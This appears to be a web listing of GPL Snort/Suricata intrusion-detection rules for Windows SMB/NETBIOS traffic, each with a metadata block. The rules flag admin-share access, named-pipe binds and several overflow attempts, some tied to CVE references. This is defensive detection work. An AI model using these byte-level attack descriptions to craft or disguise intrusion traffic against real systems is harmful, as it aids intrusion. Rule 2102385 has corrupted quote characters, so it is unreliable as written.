alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102989; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102985

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|w|00|i|00|n|00|r|00|e|00|g|00 00 00|"; within:16; distance:51; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102985; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102982

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ADMIN$ andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"ADMIN|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102982; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ADMIN$ andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102983

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ADMIN$ unicode andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"A|00|D|00|M|00|I|00|N|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102983; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ADMIN$ unicode andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102978

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS C$ andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"C|24 00|"; distance:2; nocase; content:!"IPC|24 00|"; within:5; distance:-5; nocase; classtype:protocol-command-decode; sid:2102978; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS C$ andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102979

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS C$ unicode andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"C|00 24 00 00 00|"; distance:2; nocase; content:!"I|00|P|00|C|00 24 00 00 00|"; within:10; distance:-10; nocase; classtype:protocol-command-decode; sid:2102979; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS C$ unicode andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102974

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS D$ andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"D|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102974; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS D$ andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102975

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS D$ unicode andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"D|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102975; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS D$ unicode andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102496

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCEPRC ORPCThis request flood attempt"; flow:to_server,established; content:"|05|"; depth:1; content:"|00|"; within:1; distance:1; byte_test:1,&,1,0,relative; content:"|05|"; within:1; distance:21; content:"MEOW"; flowbits:isset,dce.isystemactivator.bind.call.attempt; threshold:type both, track by_dst, count 20, seconds 60; reference:bugtraq,8811; reference:cve,2003-0813; reference:nessus,12206; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:misc-attack; sid:2102496; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCEPRC ORPCThis request flood attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-attack

URL reference : bugtraq,8811|cve,2003-0813|nessus,12206|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102491

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC ISystemActivator unicode bind attempt"; flow:to_server,established; content:"|00|"; depth:1; content:"|FF|SMB%"; depth:5; offset:4; nocase; byte_test:2,&,1,5,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 05 00 0B|"; within:15; distance:4; byte_test:1,&,16,1,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind.call.attempt; reference:bugtraq,8811; reference:cve,2003-0813; reference:nessus,12206; reference:url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx; classtype:protocol-command-decode; sid:2102491; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS DCERPC ISystemActivator unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,8811|cve,2003-0813|nessus,12206|url,www.microsoft.com/technet/security/bulletin/MS04-011.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102385

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS DCERPC NTLMSSP invalid mechlistMIC attempt"; flow:to_server,established; content:"|FF|SMBs"; depth:5; offset:4; nocase; content:"«; depth:1; offset:63; content:»|00 00 00|b|06 83 00 00 06|+|06 01 05 05 02|»; within:15; distance:1; content:»|06 0A|+|06 01 04 01 82|7|02 02 0A|»; distance:0; content:»|A3|>0<|A0|0″; distance:0; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12054; reference:nessus,12065; classtype:attempted-dos; sid:2102385; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB-DS DCERPC NTLMSSP invalid mechlistMIC attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12054|nessus,12065

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102954

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IPC$ andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"IPC|24 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2102954; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IPC$ andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102955

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IPC$ unicode andx share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"u"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_jump:2,7,little,relative; content:"I|00|P|00|C|00 24 00 00 00|"; distance:2; nocase; flowbits:set,smb.tree.connect.ipc; classtype:protocol-command-decode; sid:2102955; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IPC$ unicode andx share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102968

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102968; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102969

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102969; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102970

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102970; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102971

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102971; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NDdeSetTrustedShareW unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102402

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup AndX request username overflow attempt"; flow:to_server,established; content:"|00|"; depth:1; byte_test:2,>,322,2; content:"|FF|SMBs"; depth:5; offset:4; nocase; byte_test:1,<,128,6,relative; content:"|00 00 00 00|"; within:4; distance:42; byte_test:2,>,255,8,relative,little; content:!"|00|"; within:255; distance:10; reference:bugtraq,9752; reference:url,www.eeye.com/html/Research/Advisories/AD20040226.html; classtype:attempted-admin; sid:2102402; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup AndX request username overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,9752|url,www.eeye.com/html/Research/Advisories/AD20040226.html

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102962

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102962; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102958

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|nddeapi|00|"; within:9; distance:51; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102958; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102963

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102963; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102959

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|n|00|d|00|d|00|e|00|a|00|p|00|i|00 00 00|"; within:18; distance:51; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102959; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102951

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS too many stacked requests"; flow:to_server,established; content:"|FF|SMB"; pcre:"/^x00.{3}xFFSMB(x73|x74|x75|xa2|x24|x2d|x2e|x2f).{28}(x73|x74|x75|xa2|x24|x2d|x2e|x2f)/"; byte_jump:2,39,little; content:!"|FF|"; within:1; distance:-36; classtype:protocol-command-decode; sid:2102951; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS too many stacked requests

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102990

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102990; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102986

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|winreg|00|"; within:8; distance:51; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102986; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102987

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|w|00|i|00|n|00|r|00|e|00|g|00 00 00|"; within:16; distance:51; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102987; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102923

